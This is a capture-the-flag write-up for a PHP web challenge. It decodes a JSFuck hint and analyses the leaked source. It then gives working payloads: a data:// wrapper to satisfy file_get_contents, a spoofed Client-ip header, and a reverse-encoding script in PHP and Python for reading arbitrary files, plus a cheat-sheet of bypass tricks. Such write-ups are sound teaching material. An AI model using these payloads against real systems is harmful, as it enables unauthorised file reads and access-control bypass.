[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[
]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])

Originally I would have looked for a dedicated decoder, but it turns out that simply evaluating the expression with console.log in JavaScript is enough.

The JSFuck website can decode it as well.

Decoding pops up this text:

post me Merak

POST a parameter named Merak:

post:	Merak=me

This returns the source.

Layer three: source analysis

 <?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 

# Decoding function
function change($v){ 
    # base64-decode first
    $v = base64_decode($v); 
    $re = ''; 
    # take each character's code point and add 2*$i, where $i is its position
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
# getIp() comes from the included takeip.php and resolves the client IP (from request headers)
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
# check the IP, then check the contents of the file named by ?2333 via file_get_contents
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
	echo "Your REQUEST is:".change($_GET['file']);
    # the real file read, using the decoded path
	echo file_get_contents(change($_GET['file'])); }
?>  

One thing worth pointing out: the first file_get_contents call takes the GET parameter '2333'.

file_get_contents($_GET['2333']) === 'todat is a happy day' )
# i.e. it checks whether the file's contents equal "todat is a happy day"
# the wrapper that lets us supply the file contents inline is data:
?2333=data://text/plain,todat is a happy day

That takes care of one parameter.

The other one is the IP address, which we brute-force.

# Just run a list of candidate IP headers through Burp Intruder.
# The header that works:
Client-ip: 127.0.0.1

That leaves the GET parameter for reading the file.

The change() function above transforms the GET parameter before using it as a path, so we first need its inverse:

function unchange($v){ 
    $re = '';
    # subtract 2*$i from each character, reversing the addition in change()
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr(ord($v[$i])-$i*2); 
    } 
    # change() starts with base64_decode, so finish with base64_encode
    return base64_encode($re); 
}

Call it to encode the file we want to read:

var_dump(unchange('index.php'));
# gives: string(12) "aWxgX3AkZFpg"
var_dump(unchange('flag.php'));
# gives: string(12) "ZmpdYSZmXGI="

Read flag.php first; the full payload is:

GET: ?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
header: Client-ip: 127.0.0.1

return: # the raw PHP source, dug out of the page source (the browser does not render the <?php block)
<?php
$flag = 'flag{5843a57f-3446-425c-9a56-d3e1e1fabb51}';
echo "Flag is here~But how to get it?";
?>
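As an added example (not part of the original post), here is change() and its inverse ported to Python, together with the assembly of the final request. PHP's chr() wraps modulo 256, which the port mirrors so that the round trip holds for any byte; paths are assumed to be ASCII. The base URL passed to build_request is a placeholder and is never contacted. Note that ini_set('open_basedir','.') limits file_get_contents to the script's own directory, which is exactly where flag.php was included from.

```python
import base64
from urllib.parse import urlencode

MAGIC = "todat is a happy day"


def change(v):
    """Python port of the challenge's change(): base64-decode, then add 2*i to byte i.
    PHP's chr() wraps modulo 256, mirrored here."""
    raw = base64.b64decode(v)
    return "".join(chr((b + 2 * i) % 256) for i, b in enumerate(raw))


def unchange(path):
    """Inverse of change(): subtract 2*i from character i (ASCII path assumed),
    then base64-encode the result."""
    raw = bytes((ord(c) - 2 * i) % 256 for i, c in enumerate(path))
    return base64.b64encode(raw).decode()


def build_request(base_url, target):
    """Assemble the final request: ?2333 satisfied through the data: wrapper,
    ?file carrying the encoded path, and the Client-ip header read by getIp()."""
    params = {"2333": "data://text/plain," + MAGIC, "file": unchange(target)}
    headers = {"Client-ip": "127.0.0.1"}
    return base_url + "?" + urlencode(params), headers


if __name__ == "__main__":
    # placeholder host; the real one is the BUUCTF instance URL
    url, headers = build_request("http://example.invalid/secrettw.php", "flag.php")
    print(url)
    print(headers)
```

urlencode() percent-encodes the "=" padding of the base64 value and sends the spaces in the data: payload as "+", both of which PHP decodes back before file_get_contents sees them.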

Summary

file_get_contents()	
    # Exploitation point:
    /*
    stream wrappers:
    data://text/plain,.....
    data://text/plain;base64,....
    */
header
    # brute-forcing the request header that carries the "local" client IP
PHP parameter-name parsing
    # b u p t=23333%0a
    # https://www.freebuf.com/articles/web/213359.html
%0a newline bypass
    # preg_match with a pattern like /^23333$/ ==> /^....$/
JSFuck: decoding JS written with only ()+[]!
    # console.log prints the decoded result
    # evaluating the ()+[]! expression directly in the browser console also works
  	# online: https://jsfuck.com/